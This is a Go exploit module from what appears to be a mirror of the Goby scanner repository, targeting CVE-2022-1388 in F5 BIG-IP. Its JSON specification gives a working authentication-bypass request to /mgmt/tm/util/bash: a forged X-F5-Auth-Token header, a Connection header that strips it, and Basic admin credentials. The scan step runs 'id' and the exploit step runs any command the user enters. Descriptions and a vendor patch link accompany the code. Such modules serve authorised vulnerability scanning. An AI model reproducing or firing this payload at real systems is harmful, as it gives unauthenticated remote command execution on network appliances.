mirror of https://github.com/qwqdanchun/Goby.git
167 lines
5.9 KiB
Go
167 lines
5.9 KiB
Go
|
package exploits
|
|||
|
|
|
|||
|
|
import (
|
|||
|
|
"git.gobies.org/goby/goscanner/goutils"
|
|||
|
|
)
|
|||
|
|
|
|||
|
|
func init() {
|
|||
|
|
expJson := `{
|
|||
|
|
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
|
|||
|
|
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
|
|||
|
|
"Product": "BIG-IP",
|
|||
|
|
"Homepage": "https://fofa.so/",
|
|||
|
|
"DisclosureDate": "2022-05-11",
|
|||
|
|
"Author": "",
|
|||
|
|
"FofaQuery": "body=\"F5 Networks, Inc\"",
|
|||
|
|
"GobyQuery": "body=\"F5 Networks, Inc\"",
|
|||
|
|
"Level": "3",
|
|||
|
|
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
|
|||
|
|
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
|
|||
|
|
"References": [
|
|||
|
|
"https://fofa.so/"
|
|||
|
|
],
|
|||
|
|
"Is0day": false,
|
|||
|
|
"HasExp": true,
|
|||
|
|
"ExpParams": [
|
|||
|
|
{
|
|||
|
|
"name": "command",
|
|||
|
|
"type": "input",
|
|||
|
|
"value": "id",
|
|||
|
|
"show": ""
|
|||
|
|
}
|
|||
|
|
],
|
|||
|
|
"ExpTips": {
|
|||
|
|
"Type": "",
|
|||
|
|
"Content": ""
|
|||
|
|
},
|
|||
|
|
"ScanSteps": [
|
|||
|
|
"AND",
|
|||
|
|
{
|
|||
|
|
"Request": {
|
|||
|
|
"method": "POST",
|
|||
|
|
"uri": "/mgmt/tm/util/bash",
|
|||
|
|
"follow_redirect": true,
|
|||
|
|
"header": {
|
|||
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
|
|||
|
|
"X-F5-Auth-Token": "a",
|
|||
|
|
"Connection": "Keep-Alive, X-F5-Auth-Token",
|
|||
|
|
"Authorization": "Basic YWRtaW46",
|
|||
|
|
"Content-Type": "application/json"
|
|||
|
|
},
|
|||
|
|
"data_type": "text",
|
|||
|
|
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c 'id'\"}"
|
|||
|
|
},
|
|||
|
|
"ResponseTest": {
|
|||
|
|
"type": "group",
|
|||
|
|
"operation": "AND",
|
|||
|
|
"checks": [
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$code",
|
|||
|
|
"operation": "==",
|
|||
|
|
"value": "200",
|
|||
|
|
"bz": ""
|
|||
|
|
},
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$body",
|
|||
|
|
"operation": "contains",
|
|||
|
|
"value": "uid=",
|
|||
|
|
"bz": ""
|
|||
|
|
}
|
|||
|
|
]
|
|||
|
|
},
|
|||
|
|
"SetVariable": []
|
|||
|
|
}
|
|||
|
|
],
|
|||
|
|
"ExploitSteps": [
|
|||
|
|
"AND",
|
|||
|
|
{
|
|||
|
|
"Request": {
|
|||
|
|
"method": "POST",
|
|||
|
|
"uri": "/mgmt/tm/util/bash",
|
|||
|
|
"follow_redirect": true,
|
|||
|
|
"header": {
|
|||
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
|
|||
|
|
"X-F5-Auth-Token": "a",
|
|||
|
|
"Connection": "Keep-Alive, X-F5-Auth-Token",
|
|||
|
|
"Authorization": "Basic YWRtaW46",
|
|||
|
|
"Content-Type": "application/json"
|
|||
|
|
},
|
|||
|
|
"data_type": "text",
|
|||
|
|
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c '{{{command}}}'\"}"
|
|||
|
|
},
|
|||
|
|
"ResponseTest": {
|
|||
|
|
"type": "group",
|
|||
|
|
"operation": "AND",
|
|||
|
|
"checks": [
|
|||
|
|
{
|
|||
|
|
"type": "item",
|
|||
|
|
"variable": "$code",
|
|||
|
|
"operation": "==",
|
|||
|
|
"value": "200",
|
|||
|
|
"bz": ""
|
|||
|
|
}
|
|||
|
|
]
|
|||
|
|
},
|
|||
|
|
"SetVariable": [
|
|||
|
|
"output|lastbody||"
|
|||
|
|
]
|
|||
|
|
}
|
|||
|
|
],
|
|||
|
|
"Tags": [
|
|||
|
|
"命令执⾏"
|
|||
|
|
],
|
|||
|
|
"VulType": [
|
|||
|
|
"命令执⾏"
|
|||
|
|
],
|
|||
|
|
"CVEIDs": [
|
|||
|
|
"CVE-2022-1388"
|
|||
|
|
],
|
|||
|
|
"CNNVD": [
|
|||
|
|
""
|
|||
|
|
],
|
|||
|
|
"CNVD": [
|
|||
|
|
""
|
|||
|
|
],
|
|||
|
|
"CVSSScore": "",
|
|||
|
|
"Translation": {
|
|||
|
|
"CN": {
|
|||
|
|
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
|
|||
|
|
"Product": "BIG-IP",
|
|||
|
|
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
|
|||
|
|
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
|
|||
|
|
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
|
|||
|
|
"VulType": [
|
|||
|
|
"命令执⾏"
|
|||
|
|
],
|
|||
|
|
"Tags": [
|
|||
|
|
"命令执⾏"
|
|||
|
|
]
|
|||
|
|
},
|
|||
|
|
"EN": {
|
|||
|
|
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
|
|||
|
|
"Product": "",
|
|||
|
|
"Description": "<p style=\"text-align: justify;\">Big-ip is an application delivery service from F5 that is geared towards the world of application-centric advanced technology. Keep the application running with big-IP application delivery controller. Big-ip Local Traffic Manager (LTM) and Big-IP DNS can handle application traffic and secure the infrastructure.</p><p style=\"text-align: justify;\"></p><p style=\"text-align: justify;\">An unauthenticated attacker can use the management port or its own IP address to access the big-IP system, execute any system command, create or delete files, or disable services.</p>",
|
|||
|
|
"Recommendation": "",
|
|||
|
|
"Impact": "",
|
|||
|
|
"VulType": [],
|
|||
|
|
"Tags": []
|
|||
|
|
}
|
|||
|
|
},
|
|||
|
|
"AttackSurfaces": {
|
|||
|
|
"Application": null,
|
|||
|
|
"Support": null,
|
|||
|
|
"Service": null,
|
|||
|
|
"System": null,
|
|||
|
|
"Hardware": null
|
|||
|
|
}
|
|||
|
|
}`
|
|||
|
|
|
|||
|
|
ExpManager.AddExploit(NewExploit(
|
|||
|
|
goutils.GetFileName(),
|
|||
|
|
expJson,
|
|||
|
|
nil,
|
|||
|
|
nil,
|
|||
|
|
))
|
|||
|
|
}
|